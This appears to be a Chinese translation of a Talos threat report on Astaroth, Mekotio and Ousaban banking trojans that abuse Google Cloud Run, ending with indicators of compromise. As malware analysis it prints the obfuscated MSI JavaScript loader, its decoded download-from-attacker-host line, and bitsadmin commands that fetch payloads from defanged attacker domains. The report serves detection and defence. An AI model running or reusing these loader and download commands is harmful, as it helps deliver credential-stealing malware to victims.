多种银行木马滥用Google Cloud Run服务

Google Cloud Run 目前在大量恶意软件分发活动中被滥用，将 Astaroth（又名 Guildma）、Mekotio 和 Ousaban 等多种银行木马传播到拉丁美洲和欧洲的目标。

自 2023 年 9 月以来，与这些活动相关的电子邮件数量显着增加，我们将继续定期观察新的电子邮件分发活动。

与这些恶意软件系列相关的感染链的特点是使用恶意 Microsoft 安装程序 (MSI)，这些安装程序充当最终恶意软件负载的植入程序或下载程序。

我们观察到的证据表明，这些恶意软件系列的分发活动是相关的，Astaroth 和 Mekotio 分布在同一 Google Cloud 项目和 Google Cloud 存储桶下。作为 Astaroth 感染过程的一部分，Ousaban 也被删除。

自 2023 年 9 月以来，我们观察到利用 Google Cloud Run 服务向潜在受害者感染银行木马的恶意电子邮件数量显着增加。最近观察到的一些最大数量的活动被用来向主要位于拉丁美洲国家的受害者传送Astaroth、Mekotio和Ousaban银行木马。我们还观察到，欧洲和北美各地的活动受害者数量有所减少，这可能表明威胁行为者未来的攻击目标不再集中在地理上。目前的 Astaroth 变体针对 15 个拉丁美洲国家的 300 多家机构。

此外，我们还观察到所有三个恶意软件系列都是在同一时间范围内从 Google Cloud 内的同一存储桶传送的。就 Ousaban 而言，有效负载是作为前面提到的 Astaroth 感染的一部分进行传递的。这与重叠的分发 TTP 相结合，可能表明恶意软件家族分发活动背后的威胁行为者之间存在协作或联系，这在之前的VirusBulletin 论文中已被提及。

什么是 Google Cloud Run？

Google Cloud Run是 Google 提供的一项服务，使客户能够构建和部署位于 Google Cloud 中的 Web 服务。目前，他们为新的 Google 帐户提供 300 美元的免费积分，并每月提供 200 万个免费网络请求。

当应用程序部署在 Google Cloud Run 中时，系统会向管理员提供仪表板，其中包含有关这些 Web 应用程序所服务的请求、性能指标、负载平衡配置和图表的详细信息，类似于人们对许多流量分配系统的管理面板的期望（ TDS）通常被恶意软件传播者使用。他们还提供应用程序编程接口 (API)，允许快速自动部署 Web 服务。

基于这些特征，攻击者可能会将 Google Cloud Run 视为一种廉价但有效的方式，可以在大多数组织可能不会阻止内部系统访问的平台上部署分发基础设施。它还可以实现新的 Google Cloud Run Web 应用程序的快速轮换，因为在用户报告滥用行为后，平台提供商会删除这些应用程序。思科 Talos 联系了 Google，以确保他们了解最近在威胁领域观察到的活动。

电子邮件活动

虽然我们观察电子邮件中包含的 Google Cloud Run URL 的使用情况已有相当长一段时间，但我们在过去 18 个月中观察到的总数量的绝大多数是自 2023 年 9 月以来发生的。以下是利用电子邮件中包含的 Google Cloud Run URL 的总数量的表示形式过去 12 个月的 Google Cloud Run。

在这些活动中观察到的电子邮件的语言分布也表明了对拉丁美洲的强烈关注，绝大多数电子邮件都是用西班牙语发送的。数量较少的活动似乎也针对讲意大利语的受害者，如下所示。

我们观察到发送这些消息的大多数系统都位于巴西。

在大多数情况下，这些电子邮件使用与发票或财务和税务文件相关的主题发送，有时冒充是从目标国家/地区的地方政府税务机构发送的。在下面的示例中，该电子邮件声称来自阿根廷地方政府税务机构 Administración Federal de Ingresos Públicos (AFIP)，而阿根廷是最近经常成为恶意垃圾邮件活动的目标的国家。

这些电子邮件包含指向 Google Cloud Run 的超链接，由于使用了run[.]app顶级域名 (TLD)，因此可以识别该超链接。

当受害者访问这些超链接时，他们会被重定向到威胁参与者部署的 Cloud Run Web 服务，并提供启动感染过程所需的组件。如前所述，我们观察到 Astaroth 和 Mekotio 以恶意 Microsoft 安装程序 (MSI) 文件的形式以这种方式分发，作为开始感染过程的第一阶段有效负载。

我们观察到 MSI 文件传送方式最近有两个变化。在许多情况下，MSI 文件是直接从攻击者部署的 Google Cloud Run Web 服务传递的，如下面的 Mekotio 案例所示。

在其他情况下，Google Cloud Run Web 服务会通过 302 重定向响应到 Google Cloud 内的文件位置 ( hxxps[:]//storage[.]googleapis[.]com)。重定向会导致传送包含恶意 MSI 的 ZIP 存档。

值得注意的是，攻击者正在部署伪装机制来避免被发现。观察到的隐藏方法之一是使用geoplugin。一些 Google Cloud Run 域被重定向到检查代理和爬虫的页面，并根据收集的信息给出威胁级别。以下是重定向后观察到的示例页面。

注意：未定义索引：第 103行/var/www/html/62743bd3b3b3e/geoplugin.class.php中的 linkType注意：未定义索引：第106行/var/www/html/62743bd3b3b3e/geoplugin.class.php中的 isCrawler注意：未定义索引：第107行/var/www/html/62743bd3b3b3e/geoplugin.class.php中的 isProxy注意：未定义索引：第108行/var/www/html/62743bd3b3b3e/geoplugin.class.php中的 ThreatLevel

2024 年 1 月观察到的 Google Cloud Run URL 并未显示上述页面，而是重定向到一些合法网站。例如，https://www.google.com/?hl=US使用美国 IP 地址访问时会重定向到其中一个域。我们还看到重定向到其他平台，包括 Microsoft Outlook、Wikipedia 和 X。我们通过访问具有巴西 IP 的 URL 下载有效负载。

在我们的分析过程中，我们观察到使用同一个 Google Cloud Storage Bucket 同时传输 Mekotio 和 Astaroth 有效负载的情况。我们还观察到 Ousaban 的交付是同一 Astaroth 感染链后期阶段的一部分。由于这意味着同一个 Google Cloud 项目被用来分发这两个恶意软件系列，并且根据分发 TTP 的重叠，我们以中等信心评估这些分发活动与同一威胁参与者有关。鉴于目前犯罪软件领域的划分，很难评估分发活动是否由最终有效负载的运营商本身进行，或者是否正在使用相同的分发服务。

下面显示了传递恶意 MSI 的最终 URL 的示例。

Astaroth/Guildma

hxxps[:]//storage[.]googleapis[.]com/alele/Fat.184949849.zip?Expires=1705678087&GoogleAccessId=smart-ratio-400902%40appspot.gserviceaccount.com&Signature=a0JYCUEIUqgtwYBtulJu8NKBZU3VIXUAG2GRKcvBZbny5CA7rGeCP8Ys8FGNoishpJAgSIJuqo6QBkzNv167IVEBcUz49BZjD4cUFLhfjPaCWgqOE1iduQGyuqQkwPJIN8Y6THlvMzM8I6nlT3lpi%2BYJv56kBv6%2Boy6GariSspImcZxBJBv9unPrWSm5qRSA3icLnWvZ3PyIfEmtp4IiCQ4LItV%2Frt50p9mN4x1%2Blnq0PT5tgO%2BNkw%2FOeb0IXVZYdpTGwVSvDqGw6IHvOZP5us7u%2F%2BGEeOy%2F2kRKJMdE%2B1U%2F0UCVEp6gIbUcDQZj%2B16JwzbAGnVd4B8JJNtRrN87kg%3D%3D

Mekotio

hxxps[:]//storage[.]googleapis[.]com/alele/FAT.1705617082.zip?Expires=1705677865&GoogleAccessId=smart-ratio-400902%40appspot.gserviceaccount.com&Signature=K7npJ4T3kyH0aMrcErYkgwQ9xBdJgVCfEeTXrGd73OJ02bpTtk1e5jIiOUofmiT6bVIzsyERH9%2FhkeBaY1qtsRmafNxGE0VBAuoNrKwnrYIEYAdVjkqyoqwTN%2BEWrfCSdojylzx0iSHn1rFVqyDZJC0yETT%2BJDMa5wi%2BN3m7DGxyPVc112cXVSlwzfzW5b12I165NFUEimZ1ukLF2BzEDMLxyW5Iz%2FFUNzzt6L%2BZrsID1slWVAu%2BDaXBrhyR9zYCokUR9ig1CWLo8qBvJlMsoPqro%2F1DZpZqH36Qx%2BMTbOifj%2BAPoDCYQfqKxedXcgz4mn2VM1hxkeKRQvwFXnIsRQ%3D%3D

下图显示了 Astaroth、Ousaban 和 Mekotio 之间的重叠分配过程。

虽然我们之前介绍过Astaroth，但我们观察到最终 Astaroth 有效负载的感染过程和操作发生了变化，如下所述。

Astaroth

交付给受害者的初始 MSI 包含已放入文件中的嵌入式 JavaScript CustomAction.idt。它被混淆了，如下所示。

ExecuteScriptCode 37 var F636='u0032u0038u0030u002bu0044u0032u0038u0030u002bu0045u0032u0038u0030u002bu0022u002fu002fu0077u0033u0069u0075u0077u006cu002eu006eu0065u0078u0074u006du0061u0078u002eu006du0079u002eu0069u0064u002fu003fu0035u002fu0022u0029u003b' ; H8481='u003au0068u0022u003bu0045u0032u0038u0030u003du0022u0054u0074u0022u002bu0022u0050u003au0022u003bu0047u0065u0074u004fu0062u006au0065u0063u0074u0028u0043' ; J45='u0076u0061u0072u0020u0043u0032u0038u0030u003du0022u0073u0022u002bu0022u0063u0072u0022u003bu0044u0032u0038u0030u003du0022u0069u0070u0074u0022u002bu0022' ; K636=J45+H8481+F636; L8481=new Function(K636); L8481(); new ActiveXObject('WScript.Shell').run('cmd /V /C timeout 15>NUL&&exit',0,true);

解码后，这显然负责联系攻击者控制的服务器以检索感染过程的下一阶段。

var C280="s"+"cr";D280="ipt"+":h";E280="Tt"+"P:";GetObject(C280+D280+E280+"//w3iuwl[.]nextmax[.]my[.]id/?5/");

当执行嵌入的 JavaScript 时，恶意软件会从下一阶段分发服务器检索经过混淆的 JScript 文件，如下所示。

执行后，JScript 首先检查以下文件系统位置的内容，以确定 Astaroth 感染的下一阶段是否已下载。

如果这些位置不存在，JScript 会调用 Windows 命令处理器来创建一个包含目录位置的文件，恶意软件将使用该目录位置来存储在感染过程的此阶段检索到的各种组件。

"C:WindowsSysWOW64cmd.exe" /V /C "echo C:TempData28029613623>C:UsersPublicLibrariesfe"&& exit

JScript 还包含将用于下载下一阶段组件的 URL 列表。攻击者设置的变量被传递到 URL 选择函数中，以选择用于检索过程的 URL。下面显示了一个示例。

在分析时，所有分发 URL 都托管在同一系统上 ( 34[.]135[.]1[.]100)。在分析过程中，该 IP 地址也位于 Google Cloud 环境中。

然后，恶意软件使用 Bitsadmin live-off-the-land 二进制文件 (LoLBin) 从上述分发服务器检索下一阶段的组件。首先，它检索与 AutoIt3.exe 关联的合法可执行文件，该可执行文件将用于稍后在感染过程中执行已编译的 AutoIt 脚本。

"C:WindowsSystem32bitsadmin.exe" /transfer 18109952453 /priority foreground hxxp[:]//wae4w[.]mariomanagement[.]biz[.]id/?74709605275628771 "C:TempData28029613623Oculus.Toshiba.01997.5591.272.exe"

还可以使用 Bitsadmin 检索其他组件，例如 sqlite3.dll 和编译的 AutoIt3 脚本。

"C:WindowsSystem32bitsadmin.exe" /transfer 18109952453 /priority foreground hxxp[:]//wae4w[.]mariomanagement[.]biz[.]id/?54489451972678036 "C:TempData28029613623sqlite3.dll"
"C:WindowsSystem32bitsadmin.exe" /transfer 18109952453 /priority foreground hxxp://wae4w[.]mariomanagement[.]biz[.]id/?66559587320632971 "C:TempData28029613623Oculus.Toshiba.01997.5591.272.log"

我们还观察到 Bitsadmin 被用来检索包含数据 blob 的文件。

"C:WindowsSystem32bitsadmin.exe" /transfer 18109952453 /priority foreground hxxp[:]//wae4w[.]mariomanagement[.]biz[.]id/?50838302893639041 "C:TempData28029613623Oculus.Toshiba.01997.5591.272dbl.log"

该 blob 包含一个使用 XOR 编码的附加 PE 文件（密钥：0x2A），并且是与Ousaban银行木马相关的有效负载。

恶意软件还将用于存储各种组件的基本文件名写入恶意软件工作目录中存储的两个日志文件中。

"C:WindowsSysWOW64cmd.exe" /V /C "echo Oculus.Toshiba.01997.5591.272>C:TempData28029613623r5.log"&& exit
"C:WindowsSysWOW64cmd.exe" /V /C "echo Oculus.Toshiba.01997.5591.272>C:TempData28029613623r.log"&& exit

然后，恶意软件执行编译后的 AutoIt 脚本，以使用之前检索到的 AutoIt3.exe 二进制文件启动感染过程的下一阶段。

"C:TempData28029613623Oculus.Toshiba.01997.5591.272.exe" C:TempData28029613623Oculus.Toshiba.01997.5591.272.log

编译后的 AutoIt 脚本是根据AutoIT 社区论坛上共享的教程修改的 DLL 加载程序。攻击者混淆了一些参数的名称，例如脚本中的函数名称。该脚本包含一个嵌入的十六进制 blob，它代表一个 DLL，充当最终 Astaroth 有效负载的加载程序。有效负载本身使用名称“ ”保存到上面的同一文件夹中sdk.log，并且作为 Ousaban 有效负载，它也使用 XOR 密钥（密钥：0x2A）进行编码。

在 AutoIT 脚本加载嵌入式 Astaroth 加载器之前，它会检查加载前是否命名了文件RQJXogtisgyqqgTDKCGZoswknstidwandXLTBsqwgwhtoutwwandyideshuAYU。它可能是一个停止加载程序的终止开关。

加载器DLLsdk.log从磁盘读取“ ”文件并对其进行解码，启动进程“ regsvcs.exe”并将最终的Astaroth有效负载注入到内存中的该进程中。此变种中的大部分功能和恶意软件操作与我们之前的报告一致。然而，在我们的分析过程中观察到以下显着变化。

我们观察到除了他们通常瞄准的银行之外，还有窃取各种加密货币和比特币交易凭证的能力。此变体针对以下硬币或交易所：

Astaroth 还实现了代码来监视前台窗口是否存在流行的浏览器。一旦识别出其中一个，它将检查窗口标题以查看其监控列表中的银行之一是否已打开。

如果目标库打开，则恶意软件能够记录击键并在用户单击屏幕时截取鼠标指针周围的屏幕截图。这样做是为了捕获许多拉丁美洲银行使用的虚拟键盘的点击次数，作为针对键盘记录器的安全措施。

该恶意软件还可以针对其目标国家及其金融机构进行配置。当前的变体针对 15 个拉丁美洲国家的 300 多家机构。

有效负载使用 Ngrok ( 1[.]tcp[.]sa[.]ngrok[.]io) 通过 TCP/26885 与 C2 进行通信。在我们分析时，该服务器接受连接但没有响应。

最后，恶意软件使用启动菜单中的 LNK 文件建立持久性。名为“ ”的 LNK 文件sysupdates.setup.lnk将使用 PowerShell 执行原始 AutoIT 二进制文件，并将 AutoIT 编译的脚本作为参数传递。它还会创建下面的文件夹列表，并在内存中运行期间将加密文件放入这些文件夹中。

C:UsersPublicLibrariesfa
C:UsersPublicLibrariesfb
C:UsersPublicLibrariesfc
C:UsersPublicLibrariesfd
C:UsersPublicLibrariesd
C:UsersPublicLibrariese
C:UsersPublicLibrariesf
C:UsersPublicLibrariesdb
C:UsersPublicLibrariesdbH1
C:UsersPublicLibrariesauid.log
C:UsersPublicLibrariesax.mod
C:UsersPublicLibrariesgit2.tmp
C:UsersPublicLibrarieslogx1
C:UsersPublicLibrarieslogx2
C:UsersPublicLibrarieslogx3
C:UsersPublicLibrarieslogx4
C:UsersPublicLibrarieslogx5

在文件夹“ C:UsersPublicLibrariesdb”内，恶意软件还会创建文件，其中包含从目标银行页面获取的屏幕截图，并使用 Zlib 压缩。这些屏幕截图文件根据机器名称和驱动器序列号命名，例如“ desktopddk19bk.1e41f1721.byte”。

根据屏幕截图文件，该文件夹还包含从“B1”、“B2”、“B3”等开始顺序命名的文件。它们还使用 Zlib 进行压缩和加密，我们相信这是在将文件发送到 C2 之前完成的。由于我们无法收到 C2 的初步回复，因此无法确认这一点。

Mekotio

Mekotio 是另一个银行木马，历来以拉丁美洲受害者为目标，从受感染的系统中窃取敏感的财务信息。就 Mekotio 而言，与将 JavaScript 嵌入到 MSI 中的 Astaroth 不同，MSI 包含恶意 DLL 文件，这些文件作为二进制流包含在安装程序文件本身中。它们还包括一个 CAB 文件，其中包含两个 DLL 依赖项和一个文本文件。

$ msiinfo streams MAIL_PDF65a9a.msi

Binary.NewBinary.Updisk1.cabBinary.infoBinary.tabbackBinary.completiBinary.custiconBinary.exclamicBinary.insticonBinary.removicoBinary.repairicBinary.banner.jpgBinary.banner.svgBinary.dialog.jpgBinary.dialog.svgBinary.tnqqhgm.dllBinary.aicustact.dllBinary.cmdlinkarrowBinary.banner.scale150.jpgBinary.banner.scale125.jpgBinary.banner.scale200.jpgBinary.dialog.scale150.jpgBinary.dialog.scale125.jpgBinary.dialog.scale200.jpgBinary.SoftwareDetector.dll

摘要信息

执行 MSI 时，CAB 文件的内容将被提取到%PROGRAMDATA%. CAB文件内容包括：

libeay32.dll

ssleay32.dll

l.txt (written to %PROGRAMDATA% as 8.txt)

然后通过调用适当的导出函数来执行 DLL。

最终的有效负载是用 Delphi 编写的，并使用 VMProtect 进行打包，使分析变得更加困难。

然后，恶意软件会联系 ipinfo IP 地理定位服务来确定受感染系统的位置，然后再继续操作。该示例使用基于地理位置的过滤来防止感染不在特定地理区域内的系统。

在分析的样本中，C2 通信是通过 TCP/8088 上的 TLS 执行的，但在分析时，C2 服务器未响应请求。在同一时间范围内分析的其他样本中，我们观察到用于 C2 的 TCP 端口在样本之间发生变化。

妥协指标

这项研究的 IOC 也可以在我们的 Github 存储库中找到

哈希值 (SHA256)

已观察到以下 SHA256 与这些恶意软件活动相关。

4fa9e718fca1fa299beab1b5fea500a0e63385b5fe6d4eb1b1001f2abd97a828 (Mekotio MSI ZIP)
ed9f268ba7acdcbaeedd40a5c538c6a2637fd41a546363ed7587a6c2e5cdf02b (Mekotio MSI)
b8afd6640de8feed1774e8db3d428c0f1bca023324bb7de9a5eb99db2ea84e26 (Mekotio MSI)
8d912a99076f0bdc4fcd6e76c51a1d598339c1502086a4381f5ef67520a0ddf2 (Astaroth MSI ZIP)
094e722972e6e4d2858dd2447d30c7025e7446f4ca60a7dc5a711f906ab5b1a0 (Astaroth MSI)

Astaroth 组件

d972675774f28e7f5ad206f420470925c4fdbca681816a19aa91a6d054b8f55a (CustomAction.idt)
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d (AutoIt3.exe, benign but abused)
1a9113491deb9f21c590de4f7e9e370594e47431be482b32f8a5234ad7545a0b (AutoIt binary dropping payload)
5c4a89c81be51e9e048cf3624d4a44fd4355cf6bf56a3c10217d3d3037410b55 (Astaroth loader embedded in AutoIT script)
05ef393f6e6d3f8e1ba15eec63a1c2121744400d322a03c9c8e26c1ed58cb6a7 (Astaroth encoded payload, sdk.log)
6d7148b180367e84763690fc57cbd526433026f50dc0c029b00a714ba1660cd3 (dump.log)
b712286d4d36c74fa32127f848b79cfb857fdc2b1c84bbbee285cf34752443a2 (Benign SQlite3 library abused by malware)

Mekotio 组件

b45d8630d54c8d39e3554e0c5a71003d818617e07953520a8638f0935f04dc85（Binary.tnqqhgm.dll）
6e1434e0f8cd402f8acb0aade942c86d6b62cd6aa3927053f25 fdf57ed384b47（Binary.sknwvly.dll）

Ousaban 组件

7c7dc2065e295eb7ec60d1f8f552e455468e19e731ad20005833d71fa1371f50（Ousaban)

网址

已观察到以下 URL 与这些恶意软件活动相关。

hxxps[:]//arr-wd3463btrq-uc[.]a[.]run[.]app
hxxps[:]//storage[.]googleapis[.]com/alele/FAT.1705617082.zip
hxxps[:]//portu-wd3463btrq-uc[.]a[.]run[.]app
hxxps[:]//storage[.]googleapis[.]com/alele/Fat.184949849.zip
hxxp[:]//avfa-wd3463btrq-uc[.]a[.]run[.]app
hxxp[:]//factalia-ofh2cutija-uc[.]a[.]run[.]app
hxxp[:]//gasgas-wd3463btrq-uc[.]a[.]run[.]app
hxxp[:]//haergsd-wd3463btrq-uc[.]a[.]run[.]app
hxxp[:]//jx-krrdbo6imq-uc[.]a[.]run[.]app
hxxp[:]//ptb-wd3463btrq-uc[.]a[.]run[.]app
hxxp[:]//ptm-wd3463btrq-uc[.]a[.]run[.]app
hxxp[:]//pto-wd3463btrq-uc[.]a[.]run[.]app
hxxp[:]//w3iuwl[.]nextmax[.]my[.]id/?5/
hxxp[:]//wae4w[.]mariomanagement[.]biz[.]id/?76849368130628733
hxxp[:]//wae4w[.]mariomanagement[.]biz[.]id/?39829895502632947
hxxp[:]//wae4w[.]mariomanagement[.]biz[.]id/?61694995802639066
hxxp[:]//wae4w[.]mariomanagement[.]biz[.]id/?41991463280678058
hxxp[:]//wae4w[.]mariomanagement[.]biz[.]id/?51999170290693658
hxxp[:]//wae4w[.]mariomanagement[.]biz[.]id/?75129547751613994

知识产权

已观察到以下 IP 地址与这些恶意软件活动相关。

34[.]135[.]1[.]100

域名

已观察到以下域与这些恶意软件活动相关。

arr-wd3463btrq-uc[.]a[.]run[.]app
portu-wd3463btrq-uc[.]a[.]run[.]app
xwago[.]creativeplus[.]my[.]id
wae4w[.]mariomanagement[.]biz[.]id
h4aowa[.]mariostrategy[.]my[.]id
yaiinr[.]actiongroup[.]my[.]id
e0aonr[.]creativeplus[.]my[.]id
wiae5[.]marioadvisory[.]my[.]id
caiiaf[.]businesswise[.]biz[.]id
2joafm[.]marioanalytics[.]my[.]id
nqaa8e[.]businesswise[.]biz[.]id
nweow8[.]mariostrategy[.]my[.]id
wba0s[.]produtoeletro[.]my[.]id
4hawb[.]produtoeletro[.]my[.]id
cua3e[.]mariosolutions[.]biz[.]id
eeiul[.]marioadvisory[.]my[.]id
kka5c[.]marioanalytics[.]my[.]id
w8oaa0[.]mariosolutions[.]biz[.]id
0tuiwp[.]mariomanagement[.]biz[.]id
lwafa[.]actiongroup[.]my[.]id
avfa-wd3463btrq-uc[.]a[.]run[.]app
factalia-ofh2cutija-uc[.]a[.]run[.]app
gasgas-wd3463btrq-uc[.]a[.]run[.]app
haergsd-wd3463btrq-uc[.]a[.]run[.]app
jx-krrdbo6imq-uc[.]a[.]run[.]app
ptb-wd3463btrq-uc[.]a[.]run[.]app
ptm-wd3463btrq-uc[.]a[.]run[.]app
pto-wd3463btrq-uc[.]a[.]run[.]app
1[.]tcp[.]sa[.]ngrok[.]io

参考链接： https://blog.talosintelligence.com/google-cloud-run-abuse/

图片来源网络目标可联系删除